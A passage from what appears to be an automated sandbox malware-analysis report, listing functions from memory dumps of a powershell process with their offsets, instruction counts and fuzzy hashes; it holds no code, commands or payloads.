                          • Instruction Fuzzy Hash: C0519E347002149FD7149BADD885A6A77EAFFC8314F1488B9E509CB356EB35EC02CBA1
                          Function 049ABBA0 Relevance: .2, Instructions: 150COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 56f0fd81c42c1c1c04f0d96be854f18cdaecd8dcc2160edbb7d60a0cbdcf6960
                          • Instruction ID: d99abd9fa340765c59d298a6cbc0b02b5552f18392c1fc4137e66f75a9aeed2c
                          • Opcode Fuzzy Hash: 56f0fd81c42c1c1c04f0d96be854f18cdaecd8dcc2160edbb7d60a0cbdcf6960
                          • Instruction Fuzzy Hash: B1514871E013489FCB54CFA9D584A8DBBF6EF88310F148069E918AB365EB34A845CB90
                          Function 049A7081 Relevance: .1, Instructions: 127COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 87192b5edbf4093d42cc057238b9d4c0fa0f2230f471426ab58ccc7cb41a0bcd
                          • Instruction ID: 7665be42b8095b927b127bdbd4c0902d5f4abc0a7c4e339e0e915cfb26ccae16
                          • Opcode Fuzzy Hash: 87192b5edbf4093d42cc057238b9d4c0fa0f2230f471426ab58ccc7cb41a0bcd
                          • Instruction Fuzzy Hash: E841C734A082848FCB15CFA4C899AAD7FF1EF8A311F1945E9D441AB3A2CA34DC41CB61
                          Function 07353CCC Relevance: .1, Instructions: 125COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2256021904.0000000007350000.00000040.00000800.00020000.00000000.sdmp, Offset: 07350000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_7350000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3522de4814b43d2b037cc4a15bdd000b4cedd3b75b66e6d2d7560d58e9c34c02
                          • Instruction ID: fb23a4ae828daaca2d6e0805325a12b1110e935c5255e9405dbe219667824d62
                          • Opcode Fuzzy Hash: 3522de4814b43d2b037cc4a15bdd000b4cedd3b75b66e6d2d7560d58e9c34c02
                          • Instruction Fuzzy Hash: C04129F2A05202CFEB218F28C551EAABBF69F81798F1480A9DD088F651D735DD46C7A1
                          Function 049A2B00 Relevance: .1, Instructions: 113COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c76e7dba9b76c6aaf13508c83121759b1b54b8feb6b6500e3f13c652e7b46dd2
                          • Instruction ID: a0e067f5566e6a376a3b11498f24a8943bd1cd3ca923e37bd8cadfd8402ab08e
                          • Opcode Fuzzy Hash: c76e7dba9b76c6aaf13508c83121759b1b54b8feb6b6500e3f13c652e7b46dd2
                          • Instruction Fuzzy Hash: 05413874A006059FCB05CF58C5989EEFBB1FF49310B1186A9D816AB364C736FCA1CBA0
                          Function 049AC478 Relevance: .1, Instructions: 101COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 856ec1abc3f1460515f68f96003913f7db9e26ec2ebc612372ffb768f4d4432b
                          • Instruction ID: 2f4f939c828972f485f9a0b64a0ccdd68541115fbb0dfb4121cad29e6b886683
                          • Opcode Fuzzy Hash: 856ec1abc3f1460515f68f96003913f7db9e26ec2ebc612372ffb768f4d4432b
                          • Instruction Fuzzy Hash: 843170353016019FD709EB78E844B9AB79AEFC4215F048639E50ACB365DF75E805CBE1
                          Function 049AAF50 Relevance: .1, Instructions: 89COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e1ee03c35c81a4c70bcf06d75c3f41cb730a96b0d0b60238ead92076516795d2
                          • Instruction ID: 50ef9383293ac100c3bb5879667afa85682b8fdb70e640121e6588847c9ca13a
                          • Opcode Fuzzy Hash: e1ee03c35c81a4c70bcf06d75c3f41cb730a96b0d0b60238ead92076516795d2
                          • Instruction Fuzzy Hash: 48314D70A012099FDB08DFA9D4946AEBFF6AF89310F14802DE505EB364EA759C45CB91
                          Function 049AAE18 Relevance: .1, Instructions: 84COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 22a2b0cb644ae01f6a678c0065380d739ad6427a93a604abda520ab7fcdb5a13
                          • Instruction ID: 98a5c09700f1f7152aacbff1982834f4a22f11e71d60dfe55de32bc12988102b
                          • Opcode Fuzzy Hash: 22a2b0cb644ae01f6a678c0065380d739ad6427a93a604abda520ab7fcdb5a13
                          • Instruction Fuzzy Hash: B8319274A002459FEB41EFA8D854ABE7BF6EF84304F1188B9C511AB3E5CA749D41CB51
                          Function 049AAF60 Relevance: .1, Instructions: 84COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d3ff6d369394243fafa885ed0c2afe72a7071dc0ff07bc627936352800f29d8d
                          • Instruction ID: f9c82912cb5efd4646bfe872e26ff587b7aa42d4bfd74d39b10e6cd3a708ce13
                          • Opcode Fuzzy Hash: d3ff6d369394243fafa885ed0c2afe72a7071dc0ff07bc627936352800f29d8d
                          • Instruction Fuzzy Hash: 47314C70A016099FDB08DFA9C5947AEBAF6EFC8300F108039E905EB354EA75AC018B95
                          Function 049AE131 Relevance: .1, Instructions: 81COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4debb227519682512dd7bc95672b4b85681c2afd5052bb61175626415c1a055d
                          • Instruction ID: fb4126bff8d55e8a9d942a17f8dfc56dbb9c80a66d7cf5274b120610cdac3d16
                          • Opcode Fuzzy Hash: 4debb227519682512dd7bc95672b4b85681c2afd5052bb61175626415c1a055d
                          • Instruction Fuzzy Hash: E8315E70A006048FCB14DF69E458A9DBBF2EF89314F048969D806EB365DF74AC41CB91
                          Function 049AE140 Relevance: .1, Instructions: 77COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c13e62ea5ed94c16d86f96ba81b2faabc0118279b569b9df3a37a487f9e2e1c7
                          • Instruction ID: 1414fedb540c5250e1bbad37584de325df1067f0f8108b3bd2c8fc9aa57c8443
                          • Opcode Fuzzy Hash: c13e62ea5ed94c16d86f96ba81b2faabc0118279b569b9df3a37a487f9e2e1c7
                          • Instruction Fuzzy Hash: 5F314970A002058FCB14DF69D458A9EBBF6FF89314F048969D806EB3A4DF74AC41CB90
                          Function 049AAE28 Relevance: .1, Instructions: 77COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6eebac82438cb2ac1733bb98967527104fba231c1d1b47265a39fe58bfa9c1a9
                          • Instruction ID: fd0f090951705d6fd864ba1e7846a546adb475be496a305fc573d8c036474b21
                          • Opcode Fuzzy Hash: 6eebac82438cb2ac1733bb98967527104fba231c1d1b47265a39fe58bfa9c1a9
                          • Instruction Fuzzy Hash: 85315274A002059FEB44EFA8D854ABE77F6EF84304F108479D611AB3A4DA75AD418F91
                          Function 0480F3D8 Relevance: .1, Instructions: 76COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2223067170.000000000480D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0480D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_480d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0c94e2a978530e7eb5d608a8acd387a2db86dc5d80b1ae7b9acbcc5a9196976b
                          • Instruction ID: 8ccf791b66519234e77d293b6bed862d16a5f03d604a144a61316fb34746b7d4
                          • Opcode Fuzzy Hash: 0c94e2a978530e7eb5d608a8acd387a2db86dc5d80b1ae7b9acbcc5a9196976b
                          • Instruction Fuzzy Hash: 44214771600300DFCB55CF14D9C0B16BF65FB88314F20CAA9EF098A296C37AE416CBA1
                          Function 049A94D8 Relevance: .1, Instructions: 73COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 75f2e7ecb95ba5f315ebd0c3ee2e5237857eda061b2cb3c15c884bdbe262215d
                          • Instruction ID: e2c6fb7f880586e6a7d2e0be83d7b43ee46b0df7e05363074185324379f5960b
                          • Opcode Fuzzy Hash: 75f2e7ecb95ba5f315ebd0c3ee2e5237857eda061b2cb3c15c884bdbe262215d
                          • Instruction Fuzzy Hash: 3331AEB49053448EDB60CF6AC18838AFFE6FF88324F28C82DC85D97205D674A490CBA1
                          Function 0480F02C Relevance: .1, Instructions: 72COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2223067170.000000000480D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0480D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_480d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 37d069b265b21d0696d16d3ffdf3c8004edd587caed1d17acdc2f3a86bf8b42b
                          • Instruction ID: 2c1b6c8207647d1effb2ab07e922767f0ce0ab9a162020ecbf829fd8947bd487
                          • Opcode Fuzzy Hash: 37d069b265b21d0696d16d3ffdf3c8004edd587caed1d17acdc2f3a86bf8b42b
                          • Instruction Fuzzy Hash: ED212571614204DFDB64EF24C9C0B16BF65FB84314F24CA69DB098B296C3BAE406CA61
                          Function 049A94E8 Relevance: .1, Instructions: 69COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 5e521028710c2fae934411ccfb9d12d8c3396bc09942dfb0b029a374d79afc6b
                          • Instruction ID: 3de73f7fb46db0cba676524b2c8e1fb90d3eaecda66849569b7c68d05dc6ce3e
                          • Opcode Fuzzy Hash: 5e521028710c2fae934411ccfb9d12d8c3396bc09942dfb0b029a374d79afc6b
                          • Instruction Fuzzy Hash: 4D216BB49057448EDB60CF6AC48939AFFF6FF88314F28C82DD85D97245D77464908BA1
                          Function 049A7744 Relevance: .1, Instructions: 62COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: fc78d84d2bb124e60d0c38fc79b4948b0f5324aa085e058d38f1345f8c9de52b
                          • Instruction ID: 6f6fd8c55711ebf56fe0a566d59d7660146611721594264ae66804343307507c
                          • Opcode Fuzzy Hash: fc78d84d2bb124e60d0c38fc79b4948b0f5324aa085e058d38f1345f8c9de52b
                          • Instruction Fuzzy Hash: 9511FE39B001188FCB04DBA8E9409AE77FAEFCC715B0040A5E909DB365DA35ED158B91
                          Function 0480F3D3 Relevance: .1, Instructions: 57COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2223067170.000000000480D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0480D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_480d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                          • Instruction ID: 9425ce51af6f3a64a2b15605058b3a17a172bace390df42345519d45250b1318
                          • Opcode Fuzzy Hash: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
                          • Instruction Fuzzy Hash: 4721C076504640DFCF16CF10D9C4B15BF72FB88314F24CAA9DE494A256C33AD45ACB91
                          Function 0480F027 Relevance: .1, Instructions: 53COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2223067170.000000000480D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0480D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_480d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                          • Instruction ID: 0c483a44ec00e467763abeb71dd80e72c8ffaaa4a33cab3fd695eb215578a5f6
                          • Opcode Fuzzy Hash: 1c630ef97dc4b8389091dc56a6dd1508d93e44345cafe45a147f51fb8e987ca5
                          • Instruction Fuzzy Hash: D111D075504280CFCB22DF14D9C4B15BF61FB44314F28CAA9DA498B696C37AE44ACF61
                          Function 049ABDD0 Relevance: .0, Instructions: 50COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a100394c0aa06be38353599b9d5c5f71f2ae02f5c5e95c2c90fe35258e7bb6f6
                          • Instruction ID: 28795cc3586000bdad6b292c1b48f92a14cb581584ea0aeef826dd726fd1bd60
                          • Opcode Fuzzy Hash: a100394c0aa06be38353599b9d5c5f71f2ae02f5c5e95c2c90fe35258e7bb6f6
                          • Instruction Fuzzy Hash: 3601F1316093409FC714DB39D898A9A7FE4EF46210F1588EEE18ACB6A2CB20FC44C781
                          Function 049AE008 Relevance: .0, Instructions: 48COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0324ec418666bdad5577fe38f261504f4d571c1cb1e092b0931556a6a4250407
                          • Instruction ID: dbcde655f5e8eb86debfe2985c5349945c859d8987d57fa29af1f2a347c9cb75
                          • Opcode Fuzzy Hash: 0324ec418666bdad5577fe38f261504f4d571c1cb1e092b0931556a6a4250407
                          • Instruction Fuzzy Hash: 8B0180357012149FCB119B74EC186AEBBF5FB89215B00406DE91AD3242DB366911CB91
                          Function 049ADD80 Relevance: .0, Instructions: 48COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: aeb5a2691b4a4989439197a82b40243efb006bf8579a7e29f4f7891f6b50ce51
                          • Instruction ID: 2a9b7f31fd5a84b4bc221343eb079a351f8575dde2cd9c9e36eb5cb2c9b599b0
                          • Opcode Fuzzy Hash: aeb5a2691b4a4989439197a82b40243efb006bf8579a7e29f4f7891f6b50ce51
                          • Instruction Fuzzy Hash: AB110535204754CFC728DF35D08086ABBF6EF8931532089ADD48A8BBA0CB36F846CB50
                          Function 0480D01D Relevance: .0, Instructions: 45COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2223067170.000000000480D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0480D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_480d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ee2902abdedf68a05525f7f91ccda20cebf0bd0bc7cb9f128bce7c31e4f7984f
                          • Instruction ID: e1325f2748434cf2c3b120d6db64ce5875295219672ca02e1fd53995c24c58d4
                          • Opcode Fuzzy Hash: ee2902abdedf68a05525f7f91ccda20cebf0bd0bc7cb9f128bce7c31e4f7984f
                          • Instruction Fuzzy Hash: DB012B715053049AE7609E55ED84B67BFDCEF45324F18CA29ED4C8B2C6C279A842CAB1
                          Function 0480D007 Relevance: .0, Instructions: 44COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2223067170.000000000480D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0480D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_480d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b22a53b5ee282c28edcdeb5ad2859f3fe3c832414fbf69fdc814331b4f5f5052
                          • Instruction ID: aeba4242df2fc4e30a4160f31dc2d0445da999434dd137ab1018228a2d5b032e
                          • Opcode Fuzzy Hash: b22a53b5ee282c28edcdeb5ad2859f3fe3c832414fbf69fdc814331b4f5f5052
                          • Instruction Fuzzy Hash: 6D018C7140E3C09ED7128B259C94A52BFB4EF53224F18C5CBD8888F2E3C2695849C7B2
                          Function 049AC000 Relevance: .0, Instructions: 44COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8cffda52b6d641efcfe6f0278acafb88ef7f65ac504cf618f19aa8d2ef908a64
                          • Instruction ID: 3702329d26a0d6d7aeb8266f7f2114469716e015dde7106426feccd9adb3d54b
                          • Opcode Fuzzy Hash: 8cffda52b6d641efcfe6f0278acafb88ef7f65ac504cf618f19aa8d2ef908a64
                          • Instruction Fuzzy Hash: 61F0A4353093A41FD7118A799C94DB77FE9EF8622070540BAF454CB362D6A1CC0487A0
                          Function 049AC010 Relevance: .0, Instructions: 38COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7253bef56c31c9a627943684330ee31fae21ad7cd8d6ebe3614823e0e7ef60f7
                          • Instruction ID: 2faca453dd447a28d2830e9191b32e500c0e2d2a0f3f4670aa58c77574fca441
                          • Opcode Fuzzy Hash: 7253bef56c31c9a627943684330ee31fae21ad7cd8d6ebe3614823e0e7ef60f7
                          • Instruction Fuzzy Hash: 49F05E367092655FD7108A6A9C44DBBBFEDEBC9621B04407AF958C7352DAB1DD0086A0
                          Function 0480D9A7 Relevance: .0, Instructions: 37COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2223067170.000000000480D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0480D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_480d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c0424dfe08eb14ef2d27ec7114f0f1ae4f241d0a80343493b3a2cca813928af6
                          • Instruction ID: 7d94ef4539c3f35302fa1731ee1aa261f168a912812447768a87e0e984d846a5
                          • Opcode Fuzzy Hash: c0424dfe08eb14ef2d27ec7114f0f1ae4f241d0a80343493b3a2cca813928af6
                          • Instruction Fuzzy Hash: 9CF03776200600AF93608F0ADD84C22FBEDEFD4670719C55AE84A8B652C671FC41CEA0
                          Function 049ADFA9 Relevance: .0, Instructions: 36COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2b5509b0aeb7a3556600d30b94c27586ca6113920a4d52b951a393a192a1498c
                          • Instruction ID: a58c4d87208b31215cc168a310832edfaadd207c8a3701f6a669aff49c0d336a
                          • Opcode Fuzzy Hash: 2b5509b0aeb7a3556600d30b94c27586ca6113920a4d52b951a393a192a1498c
                          • Instruction Fuzzy Hash: C0F03A353152819FC3118B1CD494C66BBB6AFCA32532901AAF086CB736CA21DC01C791
                          Function 049A91C0 Relevance: .0, Instructions: 35COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b12acca89c81589ee6b2117704e7b12bd8c46567a3e9aff261753222db901f99
                          • Instruction ID: 940bbaf2e11a092ac58c3dcf6e1a44656c8afc5de7d60304d93c2b9c9ec5df99
                          • Opcode Fuzzy Hash: b12acca89c81589ee6b2117704e7b12bd8c46567a3e9aff261753222db901f99
                          • Instruction Fuzzy Hash: A1F0F675B142404FE711AB68C5183AB7B62DFC1319F1581AFC5059B396CE792906CBA2
                          Function 049A7A2C Relevance: .0, Instructions: 35COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 259b0e99831a2eebbd160d23ff0eabf3147929bdf18a758151a48dc816b9fc51
                          • Instruction ID: 4d51daccc7927741827bc5fc5a158baeec64cfe28227194cf0bf4384b63059af
                          • Opcode Fuzzy Hash: 259b0e99831a2eebbd160d23ff0eabf3147929bdf18a758151a48dc816b9fc51
                          • Instruction Fuzzy Hash: 0AF0E232300618AFCB149B9AD840AAFB7E9EBC8271B00452DE10AC3210DF74BC458790
                          Function 0480D998 Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2223067170.000000000480D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0480D000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_480d000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9aba9e36e31f73d11a98e31053a2178ca866e3f75c06e32dcb9b446ea788c8f4
                          • Instruction ID: d988e240e7be1071721712e278bc8bd73a24c1d7ea61ccc75b848574bedff874
                          • Opcode Fuzzy Hash: 9aba9e36e31f73d11a98e31053a2178ca866e3f75c06e32dcb9b446ea788c8f4
                          • Instruction Fuzzy Hash: 34F04975100680AFD361CF06CD84D23BBF9EF85620B29C589E84A8B352C630FC42CFA0
                          Function 049A7A30 Relevance: .0, Instructions: 33COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9dc4b760f9e043dc6b0cd377bad608bd4a027f34ee5cd2635d7eb11e8ef73738
                          • Instruction ID: d4b47dfe2bfc83b8cdeb3b1629ec3491332cb456f2e1a8a37f6c262675c5e2bc
                          • Opcode Fuzzy Hash: 9dc4b760f9e043dc6b0cd377bad608bd4a027f34ee5cd2635d7eb11e8ef73738
                          • Instruction Fuzzy Hash: C7F0A7313006185FDB149B5AD84496FB7EDEBC8275B00457DE10AD7250DF71BC458791
                          Function 049ADDF7 Relevance: .0, Instructions: 32COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f42e9cac4519e270926580ed51e49c5a919f18ea5cb5446a4bc1fbdb54d98068
                          • Instruction ID: 2418dd504d93ac0570e5c4ff4e7d50b6996690b73e2607f87e88b49a42bf385d
                          • Opcode Fuzzy Hash: f42e9cac4519e270926580ed51e49c5a919f18ea5cb5446a4bc1fbdb54d98068
                          • Instruction Fuzzy Hash: AEF0E5312067506BC712672D7C08CDF7FEACEC327030481AEE45ADB652DA54D806C7E2
                          Function 049A775F Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d558d8079ecded7b9eea86f78aa5b728a412f69b20274e772d7e65547b49640e
                          • Instruction ID: 2de40a72bfd3d1b86eb338b3688b737c1bd9000d9b6457f6f5358495c880779a
                          • Opcode Fuzzy Hash: d558d8079ecded7b9eea86f78aa5b728a412f69b20274e772d7e65547b49640e
                          • Instruction Fuzzy Hash: 67F0A0397005088FDB00DBACD940AAA77EAEFCC75570041A5E80ACB325DE34EC128BD1
                          Function 049A91D0 Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000011.00000002.2224342169.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_17_2_49a0000_powershell.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: df9ea461f13769d9d1ffa64e79a64f7163982ae654812fbf34c729b73db32c93
                          • Instruction ID: 28801fe1fe1a61f52f8925e3b8007ab4439f33636f139a40a42a5d85cdb3772d
                          • Opcode Fuzzy Hash: df9ea461f13769d9d1ffa64e79a64f7163982ae654812fbf34c729b73db32c93
                          • Instruction Fuzzy Hash: 8CF02771A106045BE710AB68C4183AFB796DFC0758F10822EC9055B399CE393906C7E1
                          Function 049A9240 Relevance: .0, Instructions: 31COMMON
                          Download Yara Rule
                          Memory Dump Source
